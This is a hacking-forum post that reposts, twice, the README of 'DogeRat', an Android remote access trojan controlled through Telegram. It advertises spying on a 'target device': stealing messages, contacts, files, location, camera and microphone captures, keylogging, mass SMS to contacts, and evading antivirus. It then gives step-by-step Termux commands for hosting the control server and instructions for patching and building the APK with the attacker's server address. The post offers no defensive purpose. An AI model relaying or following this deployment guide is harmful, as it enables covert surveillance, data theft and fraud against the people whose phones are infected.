mangosd
Code Execution Debugger
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
100 XP
I AM NOT THE OWNER AND I DONT ACCEPT ANY RESPONSIBILITY
Sign up
shivaya-dav
/
DogeRat
Public
A multifunctional Telegram based Android RAT without
A multifunctional Telegram based Android RAT without port forwarding
Features
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f534.pngReal time
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f310.pngcustom web view
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f514.pngnotification reader
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f514.pngnotification sender (send custom notification that apper on target device with custom click link)
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f5e8.pngshow toast message on target device (Toasts are messages that appear in a box at the bottom of the device)
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4e1.pngreceive information about simcard provider
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4f3.pngvibrate target device
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f6f0.pngreceive device location
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/2709.pngreceive all target message
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/2709.pngsend sms with target device to any number
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/2709.pngsend sms with target device to all of his/her contacts
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f464.pngrecive all target contacts
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4bb.pngreceive list of all installedd apps in target device
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4c1.pngreceive any file or folder from target device
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4c1.pngdelete any file or folder from target device
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4f7.pngcapture main and front camera
🎙 capture microphone (with custom duration)
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4cb.pngreceive last clipboard text
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/2705.png️auto start after device boot
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f510.pngKeylogger {Availbe in apk v1 and v2}
https://cdn.jsdelivr.net/joypixels/...sets/6.6/png/unicode/64/1f916.pngUndetectable by antivirus
Requirements
APK EDITOR
TERMUX
For hosting server code, you can use some free services like:
replit.com
glitch.com
heroku.com
Video Tutorials Available Here
Keep in mind that these sites can suspend your projects, so it's better to host on your own computer.
Download
Download Termux Download APK Editor
How to host server in Termux
Run the following commands in Termux:
pkg update && upgrade -y
pkg install git -y
git clone
cd DogeRat
bash start.sh
Enter your bot token
Enter your chatid
And hit enter
Now open a new Tab, and give these commands
pkg install openssh
bash port.sh
Enter your telegram username And hit enter
Copy url and minimize the termux
Edit apk
Open Apk editor
select apk
choose full edit
select decode all files
go to assets folder
open host.json
and enter url
in socket replace url https to wss
build apk ,start the bott Enjoy
example
{
"host": "https://yoururl.com/",
"socket": "wss://yoururl.com/",
"webView": "https://google.com/"
}
How to Build in Android Studio
To build the application in Android Studio, follow these steps:
Open the Android Studio and import the application source code.
Navigate to the following path in the source code: Utils/AppTools.kt.
In the AppTools.kt file, locate the data variable and copy your server information into it.
However, before copying the server information directly into the variable, you must encode it using Base64.
Here is an example JSON structure for your server information:
{
"host" : "",
"socket" : "",
"webView" : "https://www.google.com"
}
Fill in the above JSON structure with your server information.
Go to https://www.base64encode.org/ and copy the encoded result of your JSON data.
In Android Studio, paste the encoded result into the data variable.
The final code should look like this:
fun getAppData(): AppData {
val data = "<your encoded server info>"
val text = decode(data)
return json().fromJson(text, AppData::class.java)
}
Sign up
shivaya-dav
/
DogeRat
Public
A multifunctional Telegram based Android RAT without
A multifunctional Telegram based Android RAT without port forwarding
Features
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f534.pngReal time
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f310.pngcustom web view
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f514.pngnotification reader
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f514.pngnotification sender (send custom notification that apper on target device with custom click link)
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f5e8.pngshow toast message on target device (Toasts are messages that appear in a box at the bottom of the device)
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4e1.pngreceive information about simcard provider
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4f3.pngvibrate target device
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f6f0.pngreceive device location
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/2709.pngreceive all target message
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/2709.pngsend sms with target device to any number
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/2709.pngsend sms with target device to all of his/her contacts
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f464.pngrecive all target contacts
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4bb.pngreceive list of all installedd apps in target device
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4c1.pngreceive any file or folder from target device
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4c1.pngdelete any file or folder from target device
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4f7.pngcapture main and front camera
🎙 capture microphone (with custom duration)
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f4cb.pngreceive last clipboard text
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/2705.png️auto start after device boot
https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f510.pngKeylogger {Availbe in apk v1 and v2}
https://cdn.jsdelivr.net/joypixels/...sets/6.6/png/unicode/64/1f916.pngUndetectable by antivirus
Requirements
APK EDITOR
TERMUX
For hosting server code, you can use some free services like:
replit.com
glitch.com
heroku.com
Video Tutorials Available Here
Keep in mind that these sites can suspend your projects, so it's better to host on your own computer.
Download
Download Termux Download APK Editor
How to host server in Termux
Run the following commands in Termux:
pkg update && upgrade -y
pkg install git -y
git clone
You must upgrade your account or reply in the thread to view the hidden content.
bash start.sh
Enter your bot token
Enter your chatid
And hit enter
Now open a new Tab, and give these commands
pkg install openssh
bash port.sh
Enter your telegram username And hit enter
Copy url and minimize the termux
Edit apk
Open Apk editor
select apk
choose full edit
select decode all files
go to assets folder
open host.json
and enter url
in socket replace url https to wss
build apk ,start the bott Enjoy
example
{
"host": "https://yoururl.com/",
"socket": "wss://yoururl.com/",
"webView": "https://google.com/"
}
How to Build in Android Studio
To build the application in Android Studio, follow these steps:
Open the Android Studio and import the application source code.
Navigate to the following path in the source code: Utils/AppTools.kt.
In the AppTools.kt file, locate the data variable and copy your server information into it.
However, before copying the server information directly into the variable, you must encode it using Base64.
Here is an example JSON structure for your server information:
{
"host" : "",
"socket" : "",
"webView" : "https://www.google.com"
}
Fill in the above JSON structure with your server information.
Go to https://www.base64encode.org/ and copy the encoded result of your JSON data.
In Android Studio, paste the encoded result into the data variable.
The final code should look like this:
fun getAppData(): AppData {
val data = "<your encoded server info>"
val text = decode(data)
return json().fromJson(text, AppData::class.java)
}